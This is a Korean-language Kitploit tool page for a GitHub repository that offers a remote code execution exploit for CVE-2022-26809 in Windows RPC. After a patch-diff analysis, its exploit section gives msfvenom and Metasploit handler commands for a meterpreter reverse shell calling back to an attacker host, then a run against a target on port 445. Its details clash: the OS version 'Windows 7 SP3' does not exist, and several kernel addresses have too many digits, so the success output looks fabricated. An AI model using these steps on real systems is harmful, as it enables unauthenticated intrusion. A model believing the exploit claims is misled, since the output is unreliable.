Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-26810 — CVE-2022-26809를 대상으로 한 원격 코드 실행 익스플로잇으로, Windows RPC 힙 버퍼 오버플로우를 공격하며 msfvenom 셸코드 통합 및 meterpreter 리버스 셸 페이로드 전달을 포함합니다. | Kitploit
도구/GitHubGitHub/mr-alperen/cve-2022-26810
Payload GenerationVulnerability AnalysisExploitationShellcodePost-ExploitationPenetration TestingCommand and ControlRemote Access ToolBinary Exploitation
GitHubmr-alperen/cve-2022-26810

CVE-2022-26810

CVE-2022-26809를 대상으로 한 원격 코드 실행 익스플로잇으로, Windows RPC 힙 버퍼 오버플로우를 공격하며 msfvenom 셸코드 통합 및 meterpreter 리버스 셸 페이로드 전달을 포함합니다.

8개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2022-26809 RCE 익스플로잇

CVE 설명

CVE-2022-26809 - 핵심 Windows 구성 요소(RPC)의 취약점으로, CVSS 점수 9.8을 받은 데는 이유가 있습니다. 이 공격은 인증이 필요하지 않으며 네트워크를 통해 원격으로 실행될 수 있고, RPC 서비스의 권한으로 원격 코드 실행(RCE)을 초래할 수 있습니다. 이 권한은 RPC 런타임을 호스팅하는 프로세스에 따라 달라집니다. 이 심각한 버그는 약간의 행운과 함께 패치되지 않은 SMB를 실행하는 Windows 호스트에 액세스할 수 있게 합니다. 이 취약점은 네트워크 외부에서 침입하기 위해, 또는 네트워크 내의 시스템 간에 악용될 수 있습니다.

공급업체 정보

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809

  • https://www.pwndefend.com/2022/04/14/cve-2022-26809/

취약한 대상은?

테스트된 취약한 호스트:

  • Windows 10 Pro 빌드 10.0.10240 x64
  • Windows 10 Pro 빌드 10.0.19042 x64
  • Windows 10 Pro 빌드 10.0.19044 x64
  • Windows Server 2019 x64
  • Windows Server 2022 x64
  • Windows 7 SP3 x64

이 목록은 나중에 업데이트하겠습니다. SMB가 실행 중이고 445 포트가 열려 있는 거의 모든 빌드가 영향을 받을 것으로 생각합니다.

RPC 포트

root@kitploit:~
TCP 135,139,445

취약점 찾기

CVE에 따르면 취약점은 rpcrt4.dll이라는 라이브러리에 구현된 Windows RPC 런타임 내에 있습니다. 이 런타임 라이브러리는 RPC 프로토콜을 사용하여 통신하는 클라이언트 및 서버 프로세스 모두에 로드됩니다. 버전 10.0.22000.434(3월)와 10.0.22000.613(패치됨)을 비교하여 변경 사항 목록을 추출했습니다.

OSF_SCALL::ProcessResponse 및 OSF_CCALL::ProcessReceivedPDU 함수는 본질적으로 유사합니다. 둘 다 RPC 패킷을 처리하지만 하나는 서버 측에서 실행되고 다른 하나는 클라이언트 측에서 실행됩니다(SCALL 및 CCALL). OSF_SCALL::ProcessReceivedPDU를 비교하면서 새 버전에 추가된 두 개의 코드 블록을 발견했습니다.

pic2

pic3_new

패치된 코드를 살펴보면 QUEUE::PutOnQueue 이후에 새로운 함수가 호출되었습니다. 새로운 함수를 검사하고 해당 코드를 자세히 분석한 결과, 정수 오버플로우를 확인하는 함수임을 알게 되었습니다. 즉, 패치의 새로운 함수는 정수 변수가 예상 값 범위 내에 유지되는지 확인하기 위해 추가되었습니다.

pic1

OSF_SCALL::GetCoalescedBuffer의 취약한 코드를 더 깊이 살펴보면, 정수 오버플로우 버그로 인해 힙 버퍼 오버플로우가 발생하여 데이터가 너무 작은 버퍼에 복사될 수 있음을 알게 되었습니다. 이로 인해 버퍼 범위를 벗어나 힙에 데이터가 기록됩니다. 악용되면 이 프리미티브는 원격 코드 실행으로 이어집니다!

다른 함수에도 동일한 정수 오버플로우 검사 호출이 추가되었습니다:

OSF_CCALL::ProcessResponse OSF_SCALL::GetCoalescedBuffer OSF_CCALL::GetCoalescedBuffer

정수 오버플로우 취약점과 이를 방지하는 함수는 클라이언트 측 및 서버 측 실행 흐름 모두에 존재합니다.

익스플로잇

1단계

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.105 LPORT=4444 -f raw > shellcode.bin

2단계

root@kitploit:~
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.168.10.105
LHOST => 192.168.10.105
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

익스플로잇

CVE-2022-26809 ip port

root@kitploit:~
C:\>CVE-2022-26809.exe 192.168.10.110 445
CVE-2022-26809 RPC Remote Exploit
[+] Checking... 192.168.10.110 445
[+] 192.168.10.110 445 IsOpen
[+] found low stub at phys addr 6800!
[+] Pipe at 4ac660
[+] base of RPC heap at fffff79480048033
[+] ntoskrnl entry at fffff802435782060
[+] found Pipe self-ref entry 1eb
[+] found Alsr at fffff64480301671
[+] found RPC CALL at fffff802451b3b30
[+] load shellcode.bin
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff4ffc0033060
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff75006070a023!
[+] Try to execute shellcode!
[ ] Exploit Suceess!
도구 다운로드